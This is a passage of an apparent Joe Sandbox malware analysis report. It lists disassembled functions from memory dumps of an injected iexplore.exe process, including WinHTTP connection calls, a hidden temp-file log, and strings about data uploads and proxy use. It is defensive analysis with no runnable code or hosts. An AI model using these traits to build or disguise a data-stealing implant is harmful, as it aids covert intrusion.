      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send OP_UPLOAD_END Data Failed!, xrefs: 00515CCA
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051A93E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
    APIs
    • _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A9AD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F3337, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
    APIs
    • _errno.MSVCRT ref: 004F334F
      • Part of subcall function 004F3287: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 004F3275
    • _errno.MSVCRT ref: 004F3396
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051A729, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
    APIs
    • _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A788
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051A79D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
    APIs
    • _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A7F0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00512176, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005114F8: memset.MSVCRT ref: 0051154A
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511561
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511578
      • Part of subcall function 005114F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
      • Part of subcall function 005114F8: ___swprintf_l.LIBCMT ref: 005115E4
      • Part of subcall function 005114F8: GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTP,?,?,?,00513F99,00000000,?,00000000,?,00000000), ref: 005121C9
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00512107, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005114F8: memset.MSVCRT ref: 0051154A
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511561
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511578
      • Part of subcall function 005114F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
      • Part of subcall function 005114F8: ___swprintf_l.LIBCMT ref: 005115E4
      • Part of subcall function 005114F8: GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513DA1,00000000,?,00000000,?,00000000), ref: 0051215A
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051A8BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
    APIs
    • _errno.MSVCRT ref: 0051A8CF
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
      • Part of subcall function 0051CEF9: _errno.MSVCRT ref: 0051CF1C
    • _errno.MSVCRT ref: 0051A914
    Strings
    • abcdefghijklmnopqrstuvwxyz, xrefs: 0051A8C0
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511B92, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000001,?,00513CC2,00000000,00000000,?), ref: 00511BA8
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    • Try Https by default proxy., xrefs: 00511B94
    • OpenHttpsByDefaultProxy WinHttpOpen Failed!, xrefs: 00511BB4
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd